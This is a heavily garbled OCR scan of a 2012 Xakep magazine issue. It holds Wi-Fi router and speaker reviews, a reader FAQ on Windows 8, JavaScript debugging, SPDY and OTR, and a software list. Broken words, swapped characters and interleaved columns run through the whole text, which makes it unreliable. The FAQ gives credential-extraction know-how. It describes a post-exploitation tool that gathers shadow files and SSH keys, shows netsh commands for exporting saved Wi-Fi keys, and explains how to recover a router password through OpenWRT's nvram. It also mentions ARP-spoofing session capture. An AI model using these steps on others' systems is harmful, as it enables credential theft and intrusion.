и новичок , благо nри с ут с твует мастер пашагавой нас т ройк и и н те р н е т а и с ет и
Wi-Fi.
Опи са ние всего функци а нала д анно г о дев ай са
н е укла д ы в ае т с я в фор мат статьи , так ч т о ск ажем л и шь , ч то вряд
ли най д ется че л о в ек , ко тор о г о не ус тр о ят возможности
0-Link
OSR -500 N. В се б ы хор о ш о, н о бо льш у ю ложку д егт я д обав ля ет сырая пр о шивк а. П равда, инж е н е ры
0- Link
заявл я ют, ч то в с к о р о м време ни
в се буд е т ис п р а в л е н о . Хо т е ло с ь б ы в е рить , в е дь такие н есерьезны е n оказате л и ра бо т ы по РРТР и
Wi- Fi
с мотрят ся на фоне реа л ьной
производит ельн ости ус тро й с тв а n р осто смешно .
NETGEAR WNDR,OOO
lil
л авн ы е формы , че рн ый гля нц е вый пл ас тик, м я г кие , н е
раз дражающи е с вет о ди о ды ... У з н ае ш ь ? Пр а виль но, оче редной продук т о т
NETGEAR-
роутер
WNO R4000 . Ус т рой
с тво облада е т хоро ш ей произво дит е ль ностью , н а дежно и л егко
настраивае т ся. Н е с мо т ря на т о, что э то об щ и е сло в а,
NETGEAR
действит е ль н о с к аж д ой мод ел ь ю со в е рш е н ст в у ет с вои п оказате ли п р о и зво ди тельнос ти. Д а н ный р оу те р с т ал оче ре дн ой с т упе нью
11>
в лин ейке в ысокоп р о и з в о ди т е л ьны х устр о йств. Роуте р пор а д о вал
отли ч н ыми с к оростя ми РРТР и
NAT. П р о из во д ител ьн ос т ь б есп ро NETGEA R
водно й се ти ок аза лас ь на ур ов н е выше с р е дн ег о . Та кж е
WNOR4 000
ос н а щ е н U S В -порт ом , к кото ро му м ожет б ыт ь п о д к лю-
ч е н н акоп и тель для об щего д ос т у п а по се ти. П о дой д е т для т ех, кто пр ев ы ше всего ц ени т на д ежн о сть.
ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ
Ин те рф ей сы : Б е сnроводная точка достуnа
Частотны й д и апазон : Б ез оп а сно с ть : Фун к ции р о у т е ра :
П о дде рж ка сое д и н е ни й : Доп о лни т е ль н о :
Wi-Fi:
D-Link DSR-500 N
1х WAN [RJ- 45[ 10/ 100/1000 Мбит/се к , 4х LAN [RJ-45[ 10/ 100/1000 М б ит/се к IEEE 802.11n 2.4 Г Гц, 5 Г Гц WE P, WPA/W PA-PSK, WPA 2/WPA 2- PSK [TK IP, AE S[ NAT, Oyn ON S, Static Rou ting, DH CP, QoS РРРо Е , РРТ Р, L2ТР, Sta tic/Oynamic IP EZSetup, WPS, м едиа- с ерв ер UPnP, AiDisk, 2х USB
2х WAN [RJ-45[ 10/100/1000 М бит/сек, 4х LAN [RJ-45[10/100/1000 М бит/сек IEEE 802.11n 2.4 Г Гц WEP, WPA/WPA- PSK, WPA 2/WPA2- PSK [TKIP, AE SI NAT, DynDN S, Static Rou ting, DH CP, QoS РРРо Е , РРТ Р, L2TP, Static/Dy namic IP WP S, 1х USB, у nр авле н ие че р ез консоль, техноло ги я Green
NETGEAR WNDR4000
1х WAN [RJ -45[ 10/100/1000 М б и т/се к , 4х LAN [RJ-45[ 10/100/1000 М б и т/се к IEEE 802.1 1 a/Ь/g /n 2.4 Г Гц, 5 Г Гц WEP, WPA/ WPA- PSK, WPA 2/WPA 2- PSK [TKIP, AESI NAT, OynON S, IPTV, Static Rout ing, ОНСР, QoS РРР о Е , РРТР, L 2Т Р, Static/Oynamic IP Д о n олни т ель н о: WP S, сче т ч и к т р афика, 1 х USB
ХАКЕР
136
www.epidemz.net
04 /159/2012
Сетевой форсаж
ZYXEL KEENETIC GIGA
m мя
ZyXE L хорошо
известно в кругу людей, которые еще помнят,
что такое д оступ винтернет через
Diai-Up.
По сей д ень ком
пании уда ется держать марку и выпускать хо р ошие роутеры.
На этот ра з в нашей лаборатории оказался поклонникилинейки
Keenetic
ZyXEL
Keeпetic
Giga.
Теперь
могут радоваться появлению модели
с гигабитным коммутатором и двумя разъемами
USB
для подключе
ния накопителей или, например, принтера. Устройс тв о по-прежнему обладает несколькими видами nодключе ни й к провайдеру- по вы
деленной линии, через ЗG/4G - модем и по Wi-Fi. Также Keenetic Giga может работать в режиме точки достуnа и моста беспроводной сети .
Приобретая этот роутер, ты можешь б ыт ь уверен на 99.9 %, чт о у тебя н е
~
возникнет проблем с подключением к какому-либо провайдеру, причем не только интернет-, но и IРТV-nровайдеру. Веб-интерфейс- просто nесня. Наnример, на главном экране по казана исчерnывающая инф орма ция , даже таблица маршрутов п о м естилась. Сама <<а дминка >> д овольно шустрая, а настройки применяются за счи
танные секунды. Чт о касается скоростных показателей, т о скорость
NAT
на очень nриличн ом уровне, а nри исnользовании РРТР о н а nросе
1
дает до сре дних пок азателей. Пр оизводительность беспроводной сети также уверенно держится средних показателей.
TP-LINK TL-WR10,ЗND первую очередь это т роутер будет интересен тем, кто умеет
[]
считать деньги .
TP- Link TL-WR1 043 ND- самое
дешевое
уст ройство из нашего теста, при этом обладает гигабитным
коммутатором и USВ-портом. Однако данная модель показывает не са мые высокие скорости. Тут важ но пон ять, что ты хочеш ь от устройства: работу << из коробки >> и высокую nро и зводительность или длительную установку и настройк у сторонней прошивки? Если выбрать nервый
<4
вариант, то на сегодняшний день для
TP - Link TL-WR1043N D выnу
стили стаб ильную прошивк у, которая дружелюбна, имеет не плохой наб ор функций и не зависает. Выбирая второй вариант, т ы получаешь
больший функционал (наnример, возможность nодключить принтер к USB-пop т y l , однако сторонние прошивки совсем не гарантируют стабильной работы. Р е ш а т ь тебе, но в любом случае мы можем смело у тв ерждать, что в данном ценовом се гм енте устройство выглядит очень nривлекательно. И з недостатков стан дартной прошивки можно отметить д олгое nрименение настроек.
TP-Link TLWR1043ND
_____ ZyXEL Keenetic Giga
___...";...... --------1xWAN IRJ-45110/100/1000 Мбит/сек, 4х LAN IR J-45110/100/1000 Мбит/сек IEEE 802.11a/b/g/n 2.4 ГГц WEP, WPA/WPA-PSK, WPA2/WPA2PSK IТKIP, AESI NAT, DynDNS, Static Routing, DHCP, QoS РРРоЕ, РРТР, L2ТР, Static/Dynamic IP Доnолнительно: WPS, 1х USB
1х WAN IRJ-45110/100/1000 М бит/сек, 4х LAN IRJ-45110/100/1000 Мбит/сек
IEEE 802.11n 2.4 Г Гц WEP, WPA/WPA-PSK, WPA2/WPA2PSK ITKIP. AESI NAT, DynDNS, Static Routing, DHCP. QoS РРРоЕ. РРТР. L2TP, Static/Dynam ic IP WPS, TVport, 2х USB
ВЫ В О Д Ы Итак , если ты все е щ е сомневаешься в своем решении, то мы тебе поможем. В зяв на вооружение
ASUS RT- N66 U,
ты получишь высокоnроизводительное и функцио нальное устройство- девайс имеет хороший за nа с по
скорос ти , который- мы уверены- станет еще больше nосле выхода новых прошивок.
ASUS RT-N66U
nолучает
<< Выбор редакции>>. Звание << Л уч ш ей покупки >> присваивается раутеру
ZyXE L Keenetic GIGA за его <<всеяднос т ь>> и хорошую производи тельность. NETGEAR WNDR4000 вnишется там, где нужна производительность и стабиль н ость. Н у а модель TPLink оказалась не только очень стабиль н ой, но и самой доступной во всем тесте. :с
Х АКЕР
137
04/159/2012
www.epidemz.net
FERRUM ПРОИЗВОДИТЕЛЬНОСТЬ WI-FI, 1 М, МБИТ/С
ASUS RT -N66U 0-Link OSR-500N NETGEAR WNOR4000 TP - Link TL-WR1043NO ZyXEL Keenetic GIGA •
FDX
•
Downstream
•
Upstream
о
Наглядное пр е вос хо дство
5 ГГц канала.
10
Что касается
20
2.4 Г Гц, то
30
впереди вс ех
40
50
60
70
80
90
100
11 о
ПРОИЗВОДИТЕЛЬНОСТЬ NAT, МБИТ/С
ASUS RT -N66U
ASUS RT -N66U
0-Link OSR-500N
0- Link OSR-500N
NETGEAR WNOR4000
NETGEAR WNOR4000
TP-Link TL-WR1 043NO
TP-Link TL-WR1 043NO
ZyXEL Keenetic GIGA
ZyX EL Keenetic GIGA 1
FDX
• •
Downstream Upstream
Д аже
ASUS RT-N66U
о
50
выглядит слабым на фоне Netgeaг
1
1
130
140
ASUS RT-N66U
ПРОИЗВОДИТЕЛЬНОСТЬ РРТР, МБИТ/С
•
1
120
1
100 150 200 250 300
• •
FDX Downstream
•
Upstгeam
о
Скорее бы и другие пока затели D-Liпk
WNDR4000
DSR-500N
500
1000
1500
были схожи с данными при тест е
NAT
ПРОИЗВОДИТЕЛЬНОСТЬ WI-FI, 6 М, МБИТ/С
ASUS RT-N66U 0-Link OSR-500N NETGEAR WNOR4000 TP-Link TL-WR1 043NO ZyXEL Keenetic GIGA •
FDX
•
Downstream
•
Upstream
о
10
20
30
40
50
60
70
80
90
На удалении ско рость уменьшилась пропорционально- вnолне закономерно
ХАКЕР
138
www.epidemz.net
04/159/201 2
FERRUM
МР15 В ых одная мощность: 1. 2х2 В т
PLUS
ПРОСТО КОНФЕТКА!
Представим картину: счастливчик, купивший новый
ством идут в се необходимые кабели, а также чехол для
ноутбук, возвращается домой. Зажарив в микроволновке
транс п орти р о в к и.
гору поп-корна и приготовив сладкой колы с о льдом, он
Вообще суще с твует множество портативных систем для
Диапазон воспроизводимы х
включает фильм, который давно хотел посмотреть. Каза
воспроизвед е ния звука, но EdifieгMP15
ч ас тот :
лось бы- идиллия. Но на протяжении всего просмотра
лансирована в плане функцианала и удобства. Такую ко
100-20000 Гц
Дин а ми к и :
Plus
хорошо сба
• ди а м е тр: 40 мм • м аг нитн о е э кр а н и ро ва ни е : 6 Ом
не покидает ощущение, что что-то не так . А все из-за
лонку можн о в ез де возить с собой- карман оттягивать
звука, доносящегося из <<недодинамиков», встроенных
не будет, так как весит всего
В х одн а я чувствительность:
в ноутбук. Конечно, динамики лэптопов класса Hi-Eпd
бояться повр е дить мембрану динамика- она защищена
450
мВ
200
грамм. Также можно не
позволяют с комфортом посмотреть фильм и даже послу
пластиковой дугой.
Упр а вление : с е ле кт о р
шать музыку, но что делать обладателям более демо
Звук у EdifieгMP15
входа, восп р о изв еде ни е/
кратичных моделей? Ответить на этот вопрос поможет
у портативной колонки. В меру громкий, не перегружен
В х одной импедан с:
1О
кОм
пауза, пе р е к лю ч ен и е тр е к о в
и рад и оста н ц ий , гро мк ость
продукт компании Edifieг.
Р еж имы работы :
Edifier
3.5 мм
стерео вхо д , вос hр о и зве д е ни е
МР15
Plus
или
Plus такой, какой и должен быть
ный, без завышенных верхних частот. Эта система может
Edifier Audio
Сапdу
Plus- это
порта
с лихвой зам е нить множество настольных вариантов
тивная акустическая система- миниатюрное устрой
фирмы << ноун е йм >> большего размера. Для оценки звуча
Га бариты : 200х6 0 х 33 мм
ство приятного дизайна. К нам в тестовую лабораторию
ния мы использовали список треков, в который входили
М ас с а :
попал семпл черного цвета, но данная модель представ
песни разных стилей и фильмы. Понятно, что проелуши
с 5 0 - к а р т ы , FМ-р а ди о
0.2 кг
лена в различных цветовых вариантах на любой вкус.
вание lossless-фopмaтoв на этом устройстве бессмыс
Система имеет несколько режимов работы. Первая и,
ленно, поэтому все звуковые дорожки воспроизводились
пожалуй, самая главная функция- это воспроизве
в формате МРЗ. В качестве источника звука использова
дение музыки через линейный вход. Питается система
лись ноутбук
от встроен н ого аккумулятора, а заряжается- от
ХАКЕР
USB.
Toshiba Satellite L 635-12Qи iPod паnа 5G.
Второй и третий режимы - FМ - приемник и воспроизве
I:I§!:I•I!CD
дение музыки с 50-карты соответственно.
Пока меломаны сравнивают количество золота в своих
Настройка и управление системой происходят посред
проводах , обычные юзеры уже выбрали Edifieг МР15
ством набора клавиш, расположенных в ряд вверху
Plus
устройства. Радует, что девай с снабдилинебольшим
ноутбука. Что же мы получаем? В первую очередь, воз
дисплеем, на котором отображается нужная информа
можность смотреть фильмы и слушать музыку в разы
ция- например частота радио и имя воспроизводимого
комфортнее и громче, чем через встроенную систему.
трека. Функции стандартны и не отли ч аются от большин
Во-вторых, карманное радиосплеером для выходов на
в каче с тве портативной акустической системы для
ства оных у обычных портативных плееров, за исключе
пр ироду.
нием того, что радио может работать без подключения
Таким образом, nосле знакомства с Edifieг МР15
наушников в качестве антенны. В комплекте с устрой-
осталось только хорошее вnечатление.
Plus
I
139
04 / 159/2012
www.epidemz.net
UNITS 1 FAQ UNITED
Коллективный разум
FAQ United
ЕСТЬ ВОПРОСЫ- ПРИСЫЛАЙ НА
f1:11
1.:.1
FAQri1REAL.XAKEP.RU
Установил
Windows 8 Con sumer Preview, которую Microsoft только что
1.
1tw 1st ed m а t г i х . с om /t га с 1wi k i /Тw i sted Wo гds 1,
Через << Автозагрузку ».
Wokkel[ wokkel . ik.пu l, SleekXM РР [c ode.
представила публике . Все отлично работает,
Заходим в папку C:\Useгs\<Useг Pгofile>\ Ар р О а ta\Roa m i пg\М i с гosoft\W i nd ows\ Staгt Menu\Pг ogгams\Sta гtup и добавля-
но один момент- сильно коробит отсут
ем там ярлык, ссылаю щийся на <<ехрlогег.
П омимо этого есть замечательный серв ис
ствие кнопки « Пуск >>. Как же ее вернуть на
ехе
IMified [imified .com l, nозво ля ющ ий работать
вытащила из печки и еще т епленькой
место , назло nредnриимчивым парням из
Microsoft,
которые везде толкают свой
0000947ВО257}>>
2.
18.11
Выручит давно известная утилита
ViStaгt l lee-soft . com/v1staгt l, которая
изначально разрабатывалась для старушки
Windows
ХР, чтобы реализовать в ней меню
<<Пуск» НОВОМОДНЫХ на ТО время Vista/
Windows 7.
наибо ле е усnе шны е, но далеко не все.
с разными сетя ми через с п ециальный НТТР
Через стандартный nланировщик .
API.
Н ажимаем
Меtго-интерфейс?
n
shell:::{3080 F90 0- 07АО-110 9- ВО98-
google .com/p/sleekxmpp l - это, nожалуй,
По иронии судьбы она отлично
работает и в новой «восьмерке». Правда,
Win- R и через «Выполнить>> taskschd.msc. Дале е создаем но задачу, кликнув на <<Сгеаtе task>>. Важно
запускаем
f1:11
вую
..:".
сделать так, чтобы задача выполнялась на стар те системы, поэтому добав ля ем триггер
ITгiggeгs -7 Newl, выбирая <<Begi п the task : At log on>> и устанавлива я небольшую задерж ку I<<Oelay task fог: 5 seconds>>l. В качестве дей ствия выбираем запуск программы I<<Action :
Как быстро запустить на своем
ноутбуке виртуальную точку достуnа?
В качестве ОС используется
n
18.11
Windows .
Существует огромное количество
с п ециа льн ых утилит, о к ото ры х м ы уже
писал и. Н апример,
WiFi HotSpot Сгеаtог
l wifihotspotcгeator. com l позволяет реализо
иконка << Пу ск>> будет накладываться на
Staгt а pгogгam>>l и в качестве приложения
вать это буквально в два клика. Н ужно лишь
другие элементы таскбара, что легко
указываем <<ехрlогег.ехе sheii:::{3080F900 -
указать
исправить, если через контекстное меню
07 АО-11 09- ВО98- 0000947ВО257}>>.
и выбрать сетевой интерфейс с выходом
<<Добавить в панель задач>> создать дополни
тельный пустой тулбар. Инструкция
1.:.1
в картинках здесь : bit.ly/w7gsxv.
f1:11
1.:.1
n
Как сделать так, чтобы в
Windows 8 no умолчанию заnускалея не Меtго
интерфейс, а нормальный рабочий стол? Необходимо сделать так, чтобы на старте системы запускалея нужный
парольную фразу д ля
WPA 2
в и нет, чтобы расшарить подключение Для довольно посещаемого сервиса
к внешней сети.
хочу заnустить JаЬЬег-бота . Нагрузка
ожидается приличная, поэтому сразу
f1:11
Выбираю наиболее безопасный
хочется сделать по уму . Есть ли какие-то
1.:.1
мессенджер, который обеспечивал бы
готовые решения и заготовки, которые я
шифрование трафика. Какие есть вариан
смогу использовать?
ты?
n
n
18.11
Существует огромное количество
библиотек для ХМРР-протокола, в том
числе, например, для
шелл.
SSIO ,
Python . Twisted
Woгds
18.11
А : Можно не сильно морочить себе
голову и использовать привычный
J аЬЬег. Во-первых, большинство серверов
КАК ОТЛАДИТЬ JS-KOД НА МОБИЛЬНОМ УСТРОЙСТВЕ?
m
ы стремительноприближаемсяк тому
сценарий или на лету поправить какие-нибудь
моменту, когда большинство людей
параметры в ООМ-модели страницы, но, увы,
будут выходитьвинтернет не с ком
мобильных версий этих инструментов пока lи я
пьютеров, а с мобиль н ых планшетов и смарт
уверен, что только пока! нет. Впрочем, с учетом
D
Существует такой проект как weinгe
[ phonegap . github . com/weinгe l, кото рый очень п охож на FiгeBug и
Web
lпspectoг, но обладает одним важным отличием
фонов. Возрастает сложность мобильных
огромного количества разработок в этой об
-он предназначен для удаленной отладки
версий сайтов, но и их разработка усложня
ласти, было бы странно, если разработчики
и, в частности, позволяет выполнять отладку
ется тем, что для браузеров в Andгoid и
не нашли бы подходящих альтернатив. Их
страниц на мобильных устройствах. Таким
нет таких мощных инструментов как F iгebug
несколько. Пр ичем разрабатываются они как
образом, дебаггер может быть запу щ ен на
[аддон для Fiгefoxl или Web ln spectoг [опция
просто энтузиастами, так и гигантами вроде
компьютере, а отлаживаемая страница ото
WebKit-бpayзepoв l , которые программисты ис
Adobe.
бражаться, ска жем, на смартфоне. Сейчас под
iOS
держиваются Andгoid,
пользуют для отладк и сложного JS-кода . Н ет
iOS,
ВlасkВеггу,
webOS.
более удобного способа по ш агово выполнить
ХАКЕР
140
www.epidemz.net
04 /159/2012
FAQ UNITED
сейчас поддерживают работу через
безопасное SSL-соединение !даже если ты используешь
GTalk
БОЛЬШОЙ ВОПРОС
через браузер, весь
трафик по умолчанию идет по Н ТТРS]. Во-вторых, в большинстве клиентов можно
включить шифрование через OTR !Off-the-
Q
Recoгd]. Это протокол шифрования сообще ний для ceтeiii обмена мгновенными
В ЧЕМ СМЫСЛ ПРОТОКОЛА
Цель разработчиков
SPDY, ПРОДВИГАЕМО Г О СЕЙЧАС GOOGLE, И КАК ЕГО
время загрузки страницы на
необходимости менять сетевую инфра
структуру !для этого он работает поверх
МОЖНО ИСПОЛЬЗОВАТЬ?
сообщениями. Основные свойства протоко
привычного
ла:
в
шифрование сообщений- никто иной не сможет прочитать переписку;
аутентификация пользователей- уве ренность в том, кто является собеседни
вается в
SPDY- уменьшить 50% без
TCPI. Для этого разработчики
SPDY lпроизносится как «:пи ди >> ] _
реализовали возможность передачи не
-это экспериментальныи сетевои
скольких НТТР-запросов в одном па кете,
nротокол, который разрабаты
ввели сжатие заголовков, отказавшись
Goog le и
при этом от избыточности !к примеру,
активно продвигается
ком;
в качестве замены устаревшему НТТР.
клиентунеобязатель но каждый раз пере
слож ность в дешифровке- даже если
Важно, что это не просто проект !хотя про
давать свой Useг-Ageпtl, реализовали
потеряны секретные ключи, прошла я
токол еще нах оди т ся в стадии ч ер новика]
возможность инициировать передачу
переписка не будет скомпрометирована;
-это уже работающая технология. Его уже
данных со стороны сервера и отдавать
данные клиен ту тогда, когда это необхо
возможность отречения -третье лицо не
сейчас поддерживают браузеры
смо жет доказать, что сообщения написаны
Chгome и последняя версия Fiгefox, с его
кем -л ибо другому адресату.
помощью отдают НТТР-контент некоторые
пишет сам
сервисы
spdy-wh i tepapeг l, где он делится резуль
OTR поддерживается !по умолчанию или
!наnример,
Gmail], а
димо. Очень подробно и доходчиво об этом
так же
Google l chгom1um.oгg/s pd y/
Twitteг.
татами бенчмарков, демонстрирующих
с помощью плагинов] в Adium, Pidgin, Kopete,
Разработанный в начале 90-х годов про
эффективность
Мiгапdа
токол НТТР хотя и справляется с задачей
будут доступны исходник и веб-сервера,
по доставке содержимого веб-страниц,
поддерживающего
но делает это не оптимально. Один запрос
периментальный модуль для поддержки
1;,1 вать для деобфускации JavaScгipt
на ОДНО ТСР-соединение, ВОЗМОЖНОСТЬ
кoдa НТМL-страницы и, nрежде всего,
инициировать подключе ние только со
зловредной нагрузки !уж кто-то, а nлохие
стороны клиента, несжатые и к тому же
протоко ла доступен для Apache !code. google.com/p/mod-spdy ], есть открытый проект на Python lgithub.com/mnot/nbht tp/
ребята всегда nрибегают к обфускации)?
избыточные заголов ки запросов и от
tгee/spdy ]. Для Chгome, к слову, можно
ветов- все э то накладывает серьезные
nоставить аддон I Ьit.ly/x l deGJ I, который
r:t
l M,
Tгi lliaп,
qutiM, Psi+
и прочих.
Какие инструменты можно исnользо-
SPDY.
Там же очень скоро
SPDY.
Сейчас же экс
...
Как известно, JavaScгipt-кoд,
накладные расходы на доставку содержи
в адрес ной строке отображает, по какому
ILil
особенно зловредный, нередко
мого страниц, которая выражается в уве
протоколу передаются данные- НТТР
личенном времени загрузки страницы.
или
вставляется в обфусцированном !намеренно
SPDY.
запутанном] виде- ты можешь его прочи тать, но его логику понять без обработки невозможно. В нормальный вид он преобра
Е-
О chrome:// net-interna ls /#events
с
- ... . .
зуетс я браузером уже во время выполнения.
:
Существует немало инструментов, по зво
Capture
ляющих выполнить деобфускацию JS-кода
'
' '
~
Filter:
spd~
26
-например, Malzilla l malzi l la.souгcefoгge. ~t ]. В Сети можно найти достаточно
Export lmport
132250 SPDY SESSION
mail.google .com:443 (DIAECl)
примеров, как с ее помощью восстанавлива
Proxy
182685 SPDY SESSION
plus.google.com :443
ется исходный код боевых нагрузок
Events
188532 SPDY SESSION
www .google.com:443
10
оfЗЗ8
Desc rlptlon
Source
(ОIАЕСТ] (OIR ECТ)
lпейло адов] различных сплоитов и сплоит паков.
Встроенная в Chrome утилита !чтобы е е запустить , достаточно набрать в адресной стро ке : chrome : //пet - iпter nals) подтв е ржда е т работу н ек оторы х сайтов через SPDY.
Adobe в рамках своего Adobe Lab недавно опублико вала инструмент Adobe Shadow ilabs. adobe.com/technolo gi es/shadow]. С помощью
ее код придется предварительно вставить
этого инструмента можно связать м ежду собой
в отлаживаемую стран ицу. При открытии стра
в виде GUU-приложения, вторая же написа-
браузе р на компьютере !пока поддержива
ницы специальный сниппет будет стучаться на
на на
етс я только Chгome] и браузер на мобильном
сервер и п ередавать отладочную информацию.
в списке поддерживаемых мобильных плат
устройстве !операция называется paiгing].
П роцесс отладки соответственно осуществля
форм пока только Aпdгoid. Зато этот вариант
Таким образом удается добиться синхронизи
ется через консоль. Н а сайте есть отлич ная
рекомендуют разработчики Seпcha- извест
рованного серфинга и обновления просматри ваемых страниц одновременно на компьютере
инструкция ljsco n so l e.com/гemote-deb u gg in g. htm l] о том, как выполняется удален ная от
мобильных приложений на
и, к примеру, планшете.
ладка.
2
ХАКЕР
Компания проекта
3
Помимо этого можно исполь зо вать удаленную JаvаSсгiрt -консоль
ljsconsole.com ] - правда, для этого
в
В качестве удаленной JаvаSсгiрt консоли также можно использовать
проект RemoteJS l b1t.ly/wF6ЗOE I.
Про ект имеет две версии: первая реализована
Python
и работает в консоли. Правда ,
ного фреймвор ка, реализующего интерфейс
HTML5.
141
04 /159/ 2012
www.epidemz.net
UNITS/ FAQ UNITED Можно ли запустить утилиты для
2.
проелушивания беспроводного эфира
3.
и инъектирования произвольных па кетов
(например, aiгcгack - ngl nод Andгoid?
Открыть меню << Debug>> <<Command line .. >> .
и выбратьтам
куда
1r.1 W
Анализ в свою очередь можно осуще
где обитают разработчики
Подскажи: как максимально быстро
можно собрать информацию о Linux-
cиcтeмe, к которой был получен доступ.
В консоли выполнить команду
<<.pgmphystofile <filename»>, указав, именно нужно сохранить dump.
На известном форуме xda - developeгs.
com,
f1:t
.::.1
Инструментов для постэксплуатации
Linux-cиcтeм довольно много, в том
числе и в публичном доступе. Правда, надо иметь в виду, что подобные
кастомны"х прошивок и различных ха ков для
ствить с помощью известного фреймвор
мобильных устройств, есть несколько тем по
ка Volatility lcode .goog le.com/p/volatility l.
утилиты могут сливать полученную инфор
тому, как можно внести необходимые патчи
Есть также решения вроде Passware [1ost passwo rd .com/k i t-fo г е ns i с . htm l, поз в о
мацию <<налево>>. Из функциональных тулз
ляющие извлечь из таких дампов различные
санную на
па роли.
ного она не делает, но упрощает массу задач,
подойдут не для любой nлатформы. Позтом у
f':t
если необходимо просто отснифать трафик
..:".
в беспроводной сети, то можно воспользо
админ . Существует ли како й- нибудь способ
Утилита соберет файлы с па ролями [passwd, shadow, gshadow, master.passwd), скопирует SSН-ключи !открытые и секретные), со
ваться связкой утилит Dгo idSheep
восстановить пасс, кроме как найти этого
берет информацию о запущенных процессах
[droidsheep .de l и Shark for Root l.!!.i.tbl
самого админа?
и установленных приложениях,
в ядро Andгoid и благодаря этому запустить
.!1.l.tbl
aiгodump и aircrack-ng [наnример, znrtiB I. Однако, во-первых, предложенные
Python.
Ничего сверхъестествен
которые пришлось бы выполнять вручную.
действия- нетривиальны, а во-вторых,
wpexhд l. Первая, напомню, выnолняет ARP
Есть точка доступа , па роль для
которой устанавливал предыдущий
историю
n
и извлекает из эфира пользова
Spoofing
можно выделить l пteгsect, полностью напи
Bash
вытащит
и задачи планировщика,
Универсального способа нет, и более
просканирует внутреннюю сеть на <<живые>>
того- очень часто это невозможно.
хосты, попробует определить установленные
тельские сессии [например, для ВКонтакт еl.
W
Вторая же позволяет сохранить перехвачен
Однако все сильно зависит от раутера
в системе антивирусы и файрволы. Это лишь
ные данные в РСАР-формате, которые по зже
и прошивки , которая в нем используется.
малая часть функционала.
можно проанализировать, например,
Например, для
с по мощью Wireshaгk.
вытащить у далось, в чем мне помог один пост
f1:t
на форуме [wl 500g.infol. Для этого, правда, пришлось с качать прошивку OpenWRT [в ней по умолчанию включен telnetl и загрузить
Как выполнить дамп оперативной
памяти виртуальной машины,
..:".
ASUS WL-500gP
па роль
f1:t .::.1
в W i ndows-cиcтeмe?
n
пригодный для последующего анализа?
через механизм безопасного обновления
n
firmwa r e !необходимо отключить питание роутера, зажать кнопку <<гeset settings >>
W
В случае с VMware вс~ проще простого: для каждого snapshot а, созданного
W
Как вытащит~ ключи для безопасной
беспроводнои сети, сохраненные
Как вариант можно воспользоваться
утили той вроде WirelessKeyView [ni rsof t. net/uti ls/wireless_key.html), которая
и включить роутер, после чего тот получает
без труда извлечет их из системы и расшиф
адрес
192.168.1.1 и позволяет залить прошивку через ftpl . Весь секрет в том, что даже после
рует. Но есть способ обойтись и без сторон
памяти. В случае с VirtuaiBox'oм можно
перезагруз ки предыдущие настройки
Wiгeless Zего Coпfiguгation [та, которая
поступить следующим образом.
остаются в
отвечает за беспроводные подключения)
для виртуальной машины, есть файл с расширением
.vmem -
это и есть дамп
х ранит настройки подключения в профилях.
паролем по умолчанию и посмотреть предыду
Их список можно получить, набрав команду:
щие настройки простой командой
консоль с параметрам и:
show>>. --d bg
--staгtvm
что можно
залить новую прошивку, зайти с логином
1. Запустить виртуальную машину через
ViгtuaiBox
nvram . Получается,
<VM
них инструментов. Подсистема Wiпdows
<<nvram
Но, опять же, это лишь один конкрет
netsh wlan show pro fi les
ный случай.
паmе>
Любой профиль можно экспортировать, чем мы и воспользуемся: с
Cl·
netsh wlan export profile
па m е="< и мя
профайла>" •
...
~Comput«<Sty1t
,.. St~lt' tlemtn t .st yle{
• (opy r \Qht(t)Z0 10 ,l01t 1 8Н (OI'p0f'<lt\01'1
В результате будет создан ХМL-файл, где будут сохранены настройки для
1' <}\t"'\:> .. <heod>_ c/~d> ., <Ьоdу
onlood-" onloo6() ",. нt.. " Ьutton-stort-stuff ·
<input
tYPt•"Ьvtton"
конкретного соединения, включая ключ
vol .. ~" stort
cotor :
stuн ·~
8 Ы~оt;
<thl> thiSISog reenhl <ihl>
<hl cl o ss•" Ыue "> thi. s ts oЫue h l <lhl> <hl stylt-"co\or:red"> this i.s oreoht <lhl>
~·~
.. !!'Cirgin : O. St"': "'Irgtn-left : lt"';
.. <P>- <IP>
<P> test <lp>
e ~c ep t tons
tn
"'CCrgin - lt~t :
co\\ tюck s:
\6- " output "н/dtV>
</Ьоdу>
~>Pro~nlt~
<lht"'\>
• Ьоdу
hi .Ы~
1> t\·tnt
Ll~tf'nl':r~
импортировать в другой системе и таким
.. .
this is
а Ьlue
this is
а
f:iomc tt·~t . >
I C\1 _
d«:VO!e'lt OOdy. н y\t>.Ьo( < IJf'O\IMCoto~ ..
[правда, в зашифрованном виде). Что с этим делать? Во-первых, профайл можно
образом получить готовые настройки для
pc:ddн~g-\eft : 0 . 8t'"l;
"'~
hlml
Rt·ecn
1~ ;
poddн~g-\eft : 0.8t"'':
• <d\Y St)I\~ " "'CCf'9\tl•\tft: l t!ll">-<fdiV>
Q.
а
> paddн~~j~ : 0.4м:
• <P>- <IP>
<div
this is 111
hl{
hl
red hl
•fllll<' " ' '''"' 11'1"1 .
подключения к сетиl
netsh wlan add profile файла
с
filе п а m е= " <имя
п рофайлом . хml"
:щtl ~0111 <' hulcl
_
~ p\nk "
Но это еще не все. Е сли после импорта профайла открыть настройки подключения и перейти на вкладку << Бе зопасность>>, то ты увидишь поле для ввода ключа, запол
ненное звездочка ми. И теперь, внимание, магияl Рядом же есть галочка, позволяющая
Weinre
очень по х о ж на
FireBug
и
Web lnspector, но
предназначен для удаленной отладки
отобразить все символы ключа :). ::С
ХАКЕР
142
www.epidemz.net
04 / 159/ 201 2
k-
Mahout 0.6
Mono 2.10.8 Netty 3.3.1 Opentbs 1.7.5 Panda3d 1.8.0 Parrot 4.0.0 Rails 3.2 Sabredav 1.5.7 Ujorm 1.22 Wro4j 1.4.4
ВFТ
- Browser farensic tool Browser Forensic Т ool
Browzar 2.0
codesensor
РНР
Aard Dictionaгy 0.9.3 AIIDup 3.4.0 DispliJYFusion 3.4.1 Evernote 4.5.3.61 31 Everything 1.2.1.371 FilePro 1.0 НоеКеу 1.13
lronWASP
Ma_gicTree 1.1 mimikatz 1.0
> MISC
1Ьу1 1.75 Audacity 1.3.14 AutoBrake 1.07 CamSpace 8.95 Capture2T ext 1.1 О
Psi 0.14
Omea Reader 2.2
Crossloop 2.82 Fiddler 2.3.9.3 Lanshark 0.0.2 Lunascape 6.6.0 mRemote 1.50 NetWorx 5.2.2
>Net дutoPu ттv 0.24.2 Awasu 3.0 Cookienalor 2.6.41
SkypeAutoRecorder Songr 1.9.33 TagScanner 5.1.61 О Tunatic 1.0.1 Ь Videolns~or 2.3.0.126 VLC 2.0
Picasa 3.9
Free Audio Editor 2012 mpTrim 2.13 music2pc 2.12
Format Factory 2.90
